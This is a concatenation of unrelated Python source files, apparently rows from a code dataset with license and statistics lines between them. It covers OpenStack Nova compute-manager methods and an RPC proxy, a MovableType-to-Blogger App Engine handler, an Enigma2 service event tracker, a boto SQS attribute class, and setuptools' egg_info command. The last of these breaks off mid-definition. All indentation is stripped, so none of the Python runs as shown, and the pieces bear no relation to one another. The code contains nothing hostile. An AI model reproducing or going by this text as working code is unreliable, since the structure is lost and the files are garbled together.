self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@aggregate_object_compat
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
self.network_api.get_instance_nw_info(context, instance)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
During resize/revert-resize operation, if that instance gets deleted
in-between then instance files might remain either on source or
destination compute node because of race condition.
"""
LOG.debug('Cleaning up deleted instances with incomplete migration ')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
# Delete instance files if not cleanup properly either
# from the source or destination compute nodes when
# the instance is deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning(_LW("Migration %s is not found."),
migration.id, context=context,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
completed before unqueiscing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception(_LE("Exception while waiting completion of "
"volume snapshots: %s"),
error, instance=instance)
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.unquiesce(context, instance, image_meta)
# TODO(danms): This goes away immediately in Lemming and is just
# present in Kilo so that we can receive v3.x and v4.0 messages
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.0')
def __init__(self, manager):
self.manager = manager
def add_aggregate_host(self, ctxt, aggregate, host, slave_info=None):
return self.manager.add_aggregate_host(ctxt, aggregate, host,
slave_info=slave_info)
def add_fixed_ip_to_instance(self, ctxt, network_id, instance):
return self.manager.add_fixed_ip_to_instance(ctxt,
network_id,
instance)
def attach_interface(self, ctxt, instance, network_id, port_id,
requested_ip):
return self.manager.attach_interface(ctxt, instance, network_id,
port_id, requested_ip)
def attach_volume(self, ctxt, instance, bdm):
# NOTE(danms): In 3.x, attach_volume had mountpoint and volume_id
# parameters, which are gone from 4.x. Provide None for each to
# the 3.x manager above and remove in Lemming.
return self.manager.attach_volume(ctxt, None, None,
instance=instance,
bdm=bdm)
def change_instance_metadata(self, ctxt, instance, diff):
return self.manager.change_instance_metadata(
ctxt, diff=diff, instance=instance)
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
return self.manager.check_can_live_migrate_destination(
ctxt, instance, block_migration, disk_over_commit)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
return self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
def check_instance_shared_storage(self, ctxt, instance, data):
return self.manager.check_instance_shared_storage(ctxt, instance, data)
def confirm_resize(self, ctxt, instance, reservations, migration):
return self.manager.confirm_resize(ctxt, instance,
reservations, migration)
def detach_interface(self, ctxt, instance, port_id):
return self.manager.detach_interface(ctxt, instance, port_id)
def detach_volume(self, ctxt, volume_id, instance):
# NOTE(danms): Pass instance by kwarg to help the object_compat
# decorator, as real RPC dispatch does.
return self.manager.detach_volume(ctxt, volume_id, instance=instance)
def finish_resize(self, ctxt, disk_info, image, instance,
reservations, migration):
return self.manager.finish_resize(ctxt, disk_info, image, instance,
reservations, migration)
def finish_revert_resize(self, ctxt, instance,
reservations, migration):
return self.manager.finish_revert_resize(ctxt, instance,
reservations, migration)
def get_console_output(self, ctxt, instance, tail_length):
return self.manager.get_console_output(ctxt, instance, tail_length)
def get_console_pool_info(self, ctxt, console_type):
return self.manager.get_console_pool_info(ctxt, console_type)
def get_console_topic(self, ctxt):
return self.manager.get_console_topic(ctxt)
def get_diagnostics(self, ctxt, instance):
return self.manager.get_diagnostics(ctxt, instance)
def get_instance_diagnostics(self, ctxt, instance):
return self.manager.get_instance_diagnostics(ctxt, instance)
def get_vnc_console(self, ctxt, console_type, instance):
return self.manager.get_vnc_console(ctxt, console_type, instance)
def get_spice_console(self, ctxt, console_type, instance):
return self.manager.get_spice_console(ctxt, console_type, instance)
def get_rdp_console(self, ctxt, console_type, instance):
return self.manager.get_rdp_console(ctxt, console_type, instance)
def get_serial_console(self, ctxt, console_type, instance):
return self.manager.get_serial_console(ctxt, console_type, instance)
def validate_console_port(self, ctxt, instance, port, console_type):
return self.manager.validate_console_port(ctxt, instance, port,
console_type)
def host_maintenance_mode(self, ctxt, host, mode):
return self.manager.host_maintenance_mode(ctxt, host, mode)
def host_power_action(self, ctxt, action):
return self.manager.host_power_action(ctxt, action)
def inject_network_info(self, ctxt, instance):
return self.manager.inject_network_info(ctxt, instance)
def live_migration(self, ctxt, dest, instance, block_migration,
migrate_data=None):
return self.manager.live_migration(ctxt, dest, instance,
block_migration,
migrate_data=migrate_data)
def pause_instance(self, ctxt, instance):
return self.manager.pause_instance(ctxt, instance)
def post_live_migration_at_destination(self, ctxt, instance,
block_migration):
return self.manager.post_live_migration_at_destination(
ctxt, instance, block_migration)
def pre_live_migration(self, ctxt, instance, block_migration, disk,
migrate_data=None):
return self.manager.pre_live_migration(ctxt, instance, block_migration,
disk, migrate_data=migrate_data)
def prep_resize(self, ctxt, image, instance, instance_type,
reservations=None, request_spec=None,
filter_properties=None, node=None, clean_shutdown=True):
return self.manager.prep_resize(ctxt, image, instance, instance_type,
reservations=reservations,
request_spec=request_spec,
filter_properties=filter_properties,
node=node,
clean_shutdown=clean_shutdown)
def reboot_instance(self, ctxt, instance, block_device_info, reboot_type):
return self.manager.reboot_instance(ctxt, instance, block_device_info,
reboot_type)
def rebuild_instance(self, ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
return self.manager.rebuild_instance(
ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=preserve_ephemeral)
def refresh_security_group_rules(self, ctxt, security_group_id):
return self.manager.refresh_security_group_rules(ctxt,
security_group_id)
def refresh_security_group_members(self, ctxt, security_group_id):
return self.manager.refresh_security_group_members(ctxt,
security_group_id)
def refresh_instance_security_rules(self, ctxt, instance):
return self.manager.refresh_instance_security_rules(ctxt, instance)
def refresh_provider_fw_rules(self, ctxt):
return self.manager.refresh_provider_fw_rules(ctxt)
def remove_aggregate_host(self, ctxt, host, slave_info, aggregate):
return self.manager.remove_aggregate_host(ctxt,
host, slave_info,
aggregate)
def remove_fixed_ip_from_instance(self, ctxt, address, instance):
return self.manager.remove_fixed_ip_from_instance(ctxt, address,
instance)
def remove_volume_connection(self, ctxt, instance, volume_id):
return self.manager.remove_volume_connection(ctxt, instance, volume_id)
def rescue_instance(self, ctxt, instance, rescue_password,
rescue_image_ref, clean_shutdown):
return self.manager.rescue_instance(ctxt, instance, rescue_password,
rescue_image_ref=rescue_image_ref,
clean_shutdown=clean_shutdown)
def reset_network(self, ctxt, instance):
return self.manager.reset_network(ctxt, instance)
def resize_instance(self, ctxt, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
return self.manager.resize_instance(ctxt, instance, image,
reservations, migration,
instance_type,
clean_shutdown=clean_shutdown)
def resume_instance(self, ctxt, instance):
return self.manager.resume_instance(ctxt, instance)
def revert_resize(self, ctxt, instance, migration, reservations=None):
return self.manager.revert_resize(ctxt, instance, migration,
reservations=reservations)
def rollback_live_migration_at_destination(self, ctxt, instance,
destroy_disks,
migrate_data):
return self.manager.rollback_live_migration_at_destination(
ctxt, instance, destroy_disks=destroy_disks,
migrate_data=migrate_data)
def set_admin_password(self, ctxt, instance, new_pass):
return self.manager.set_admin_password(ctxt, instance, new_pass)
def set_host_enabled(self, ctxt, enabled):
return self.manager.set_host_enabled(ctxt, enabled)
def swap_volume(self, ctxt, instance, old_volume_id, new_volume_id):
return self.manager.swap_volume(ctxt, old_volume_id, new_volume_id,
instance)
def get_host_uptime(self, ctxt):
return self.manager.get_host_uptime(ctxt)
def reserve_block_device_name(self, ctxt, instance, device, volume_id,
disk_bus=None, device_type=None):
return self.manager.reserve_block_device_name(ctxt, instance, device,
volume_id,
disk_bus=disk_bus,
device_type=device_type,
return_bdm_object=True)
def backup_instance(self, ctxt, image_id, instance, backup_type,
rotation):
return self.manager.backup_instance(ctxt, image_id, instance,
backup_type, rotation)
def snapshot_instance(self, ctxt, image_id, instance):
return self.manager.snapshot_instance(ctxt, image_id, instance)
def start_instance(self, ctxt, instance):
return self.manager.start_instance(ctxt, instance)
def stop_instance(self, ctxt, instance, clean_shutdown):
return self.manager.stop_instance(ctxt, instance, clean_shutdown)
def suspend_instance(self, ctxt, instance):
return self.manager.suspend_instance(ctxt, instance)
def terminate_instance(self, ctxt, instance, bdms, reservations=None):
return self.manager.terminate_instance(ctxt, instance, bdms,
reservations=reservations)
def unpause_instance(self, ctxt, instance):
return self.manager.unpause_instance(ctxt, instance)
def unrescue_instance(self, ctxt, instance):
return self.manager.unrescue_instance(ctxt, instance)
def soft_delete_instance(self, ctxt, instance, reservations):
return self.manager.soft_delete_instance(ctxt, instance, reservations)
def restore_instance(self, ctxt, instance):
return self.manager.restore_instance(ctxt, instance)
def shelve_instance(self, ctxt, instance, image_id=None,
clean_shutdown=True):
return self.manager.shelve_instance(ctxt, instance, image_id=image_id,
clean_shutdown=clean_shutdown)
def shelve_offload_instance(self, ctxt, instance, clean_shutdown):
return self.manager.shelve_offload_instance(ctxt, instance,
clean_shutdown)
def unshelve_instance(self, ctxt, instance, image=None,
filter_properties=None, node=None):
return self.manager.unshelve_instance(
ctxt, instance, image=image,
filter_properties=filter_properties,
node=node)
def volume_snapshot_create(self, ctxt, instance, volume_id, create_info):
return self.manager.volume_snapshot_create(ctxt, instance, volume_id,
create_info)
def volume_snapshot_delete(self, ctxt, instance, volume_id, snapshot_id,
delete_info):
return self.manager.volume_snapshot_delete(ctxt, instance, volume_id,
snapshot_id, delete_info)
def external_instance_event(self, ctxt, instances, events):
return self.manager.external_instance_event(ctxt, instances, events)
def build_and_run_instance(self, ctxt, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
return self.manager.build_and_run_instance(
ctxt, instance, image, request_spec, filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
node=node, limits=limits)
def quiesce_instance(self, ctxt, instance):
return self.manager.quiesce_instance(ctxt, instance)
def unquiesce_instance(self, ctxt, instance, mapping=None):
return self.manager.unquiesce_instance(ctxt, instance, mapping=mapping)
| apache-2.0 | -2,871,954,071,504,506,400 | -5,514,878,904,892,532,000 | 45.071846 | 79 | 0.559565 | false |
tectronics/google-blog-converters-appengine | src/movabletype2blogger/movabletype2blogger.py | 30 | 2023 | #!/usr/bin/env python
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import traceback
import StringIO
import gdata.service
import gdata.urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import mt2b
import wsgiref.handlers
__author__ = 'JJ Lueck ([email protected])'
# Use urlfetch instead of httplib
gdata.service.http_request_handler = gdata.urlfetch
class TransformPage(webapp.RequestHandler):
def post(self):
# All input/output will be in UTF-8
self.response.charset = 'utf8'
# Parse the mulit-part form-data part out of the POST
input = self.request.get('input-file', allow_multiple=False)
# Run the blogger import processor
translator = mt2b.MovableType2Blogger()
try:
translator.Translate(StringIO.StringIO(input), self.response.out)
self.response.content_type = 'application/atom+xml'
self.response.headers['Content-Disposition'] = \
'attachment;filename=blogger-export.xml'
except:
# Just provide an error message to the user.
self.response.content_type = 'text/plain'
self.response.out.write("Error encountered during conversion.<br/><br/>")
exc = traceback.format_exc()
self.response.out.write(exc.replace('\n', '<br/>'))
application = webapp.WSGIApplication([('/mt2b/', TransformPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 | -782,071,185,425,581,400 | -1,073,315,678,656,401,400 | 30.609375 | 79 | 0.71132 | false |
popazerty/try | lib/python/Components/ServiceEventTracker.py | 10 | 4229 | InfoBarCount = 0
class InfoBarBase:
onInfoBarOpened = [ ]
onInfoBarClosed = [ ]
@staticmethod
def connectInfoBarOpened(fnc):
if not fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.append(fnc)
@staticmethod
def disconnectInfoBarOpened(fnc):
if fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.remove(fnc)
@staticmethod
def infoBarOpened(infobar):
for x in InfoBarBase.onInfoBarOpened:
x(infobar)
@staticmethod
def connectInfoBarClosed(fnc):
if not fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.append(fnc)
@staticmethod
def disconnectInfoBarClosed(fnc):
if fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.remove(fnc)
@staticmethod
def infoBarClosed(infobar):
for x in InfoBarBase.onInfoBarClosed:
x(infobar)
def __init__(self, steal_current_service = False):
if steal_current_service:
ServiceEventTracker.setActiveInfoBar(self, None, None)
else:
nav = self.session.nav
ServiceEventTracker.setActiveInfoBar(self, not steal_current_service and nav.getCurrentService(), nav.getCurrentlyPlayingServiceOrGroup())
self.onClose.append(self.__close)
InfoBarBase.infoBarOpened(self)
global InfoBarCount
InfoBarCount += 1
def __close(self):
ServiceEventTracker.popActiveInfoBar()
InfoBarBase.infoBarClosed(self)
global InfoBarCount
InfoBarCount -= 1
class ServiceEventTracker:
"""Tracks service events into a screen"""
InfoBarStack = [ ]
InfoBarStackSize = 0
oldServiceStr = None
EventMap = { }
navcore = None
@staticmethod
def event(evt):
set = ServiceEventTracker
func_list = set.EventMap.setdefault(evt, [])
if func_list:
nav = set.navcore
cur_ref = nav.getCurrentlyPlayingServiceOrGroup()
try:
old_service_running = set.oldRef and cur_ref and cur_ref == set.oldRef and set.oldServiceStr == nav.getCurrentService().getPtrString()
except:
old_service_running = None
if not old_service_running and set.oldServiceStr:
set.oldServiceStr = None
set.oldRef = None
ssize = set.InfoBarStackSize
stack = set.InfoBarStack
for func in func_list:
if (func[0] or # let pass all events to screens not derived from InfoBarBase
(not old_service_running and stack[ssize-1] == func[1]) or # let pass events from currently running service just to current active screen (derived from InfoBarBase)
(old_service_running and ssize > 1 and stack[ssize-2] == func[1])): # let pass events from old running service just to previous active screen (derived from InfoBarBase)
func[2]()
@staticmethod
def setActiveInfoBar(infobar, old_service, old_ref):
set = ServiceEventTracker
set.oldRef = old_ref
set.oldServiceStr = old_service and old_service.getPtrString()
assert infobar not in set.InfoBarStack, "FATAL: Infobar '" + str(infobar) + "' is already active!"
set.InfoBarStack.append(infobar)
set.InfoBarStackSize += 1
# print "ServiceEventTracker set active '" + str(infobar) + "'"
@staticmethod
def popActiveInfoBar():
set = ServiceEventTracker
stack = set.InfoBarStack
if set.InfoBarStackSize:
nav = set.navcore
set.InfoBarStackSize -= 1
del stack[set.InfoBarStackSize]
old_service = nav.getCurrentService()
set.oldServiceStr = old_service and old_service.getPtrString()
set.oldRef = nav.getCurrentlyPlayingServiceOrGroup()
# if set.InfoBarStackSize:
# print "ServiceEventTracker reset active '" + str(stack[set.InfoBarStackSize-1]) + "'"
def __init__(self, screen, eventmap):
self.__screen = screen
self.__eventmap = eventmap
self.__passall = not isinstance(screen, InfoBarBase) # let pass all events to screens not derived from InfoBarBase
EventMap = ServiceEventTracker.EventMap
if not len(EventMap):
screen.session.nav.event.append(ServiceEventTracker.event)
ServiceEventTracker.navcore = screen.session.nav
EventMap = EventMap.setdefault
for x in eventmap.iteritems():
EventMap(x[0], []).append((self.__passall, screen, x[1]))
screen.onClose.append(self.__del_event)
def __del_event(self):
EventMap = ServiceEventTracker.EventMap.setdefault
for x in self.__eventmap.iteritems():
EventMap(x[0], []).remove((self.__passall, self.__screen, x[1]))
| gpl-2.0 | 884,084,976,387,787,900 | -628,201,075,888,394,100 | 32.563492 | 173 | 0.740837 | false |
abridgett/boto | boto/sqs/attributes.py | 223 | 1718 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an SQS Attribute Name/Value set
"""
class Attributes(dict):
def __init__(self, parent):
self.parent = parent
self.current_key = None
self.current_value = None
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Attribute':
self[self.current_key] = self.current_value
elif name == 'Name':
self.current_key = value
elif name == 'Value':
self.current_value = value
else:
setattr(self, name, value)
| mit | 2,047,162,343,982,661,600 | -7,756,429,318,355,415,000 | 36.347826 | 74 | 0.694412 | false |
ephoning/heroku-buildpack-python | vendor/distribute-0.6.36/setuptools/command/egg_info.py | 66 | 15621 | """setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
# This module should be kept compatible with Python 2.3
import os, re, sys
from setuptools import Command
from distutils.errors import *
from distutils import log
from setuptools.command.sdist import sdist
from distutils.util import convert_path
from distutils.filelist import FileList as _FileList
from pkg_resources import parse_requirements, safe_name, parse_version, \
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename
from sdist import walk_revctrl
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setopt import edit_config
edit_config(
filename,
{'egg_info':
{'tag_svn_revision':0, 'tag_date': 0, 'tag_build': self.tags()}
}
)
def finalize_options (self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
try:
list(
parse_requirements('%s==%s' % (self.egg_name,self.egg_version))
)
except ValueError:
raise DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name,self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('',os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name)+'.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name: self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key==self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
``delete_file(filename)`. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if sys.version_info >= (3,):
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
version = ''
if self.tag_build:
version+=self.tag_build
if self.tag_svn_revision and (
os.path.exists('.svn') or os.path.exists('PKG-INFO')
): version += '-r%s' % self.get_svn_revision()
if self.tag_date:
import time; version += time.strftime("-%Y%m%d")
return version
def get_svn_revision(self):
revision = 0
urlre = re.compile('url="([^"]+)"')
revre = re.compile('committed-rev="(\d+)"')
for base,dirs,files in os.walk(os.curdir):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
f = open(os.path.join(base,'.svn','entries'))
data = f.read()
f.close()
if data.startswith('10') or data.startswith('9') or data.startswith('8'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8' or '9' or '10'
dirurl = data[0][3]
localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]+[0])
elif data.startswith('<?xml'):
dirurl = urlre.search(data).group(1) # get repository URL
localrev = max([int(m.group(1)) for m in revre.finditer(data)]+[0])
else:
log.warn("unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base==os.curdir:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return str(revision or get_pkg_info_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info,"SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name+'.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-"*78+'\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n'+'-'*78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if sys.version_info >= (3,):
try:
if os.path.exists(path) or os.path.exists(path.encode('utf-8')):
self.files.append(path)
except UnicodeEncodeError:
# Accept UTF-8 filenames even if LANG=C
if os.path.exists(path.encode('utf-8')):
self.files.append(path)
else:
log.warn("'%s' not %s encodable -- skipping", path,
sys.getfilesystemencoding())
else:
if os.path.exists(path):
self.files.append(path)
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options (self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def write_manifest (self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
# The manifest must be UTF-8 encodable. See #303.
if sys.version_info >= (3,):
files = []
for file in self.filelist.files:
try:
file.encode("utf-8")
except UnicodeEncodeError:
log.warn("'%s' not UTF-8 encodable -- skipping" % file)
else:
files.append(file)
self.filelist.files = files
files = self.filelist.files
if os.sep!='/':
files = [f.replace(os.sep,'/') for f in files]
self.execute(write_file, (self.manifest, files),
"writing manifest file '%s'" % self.manifest)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
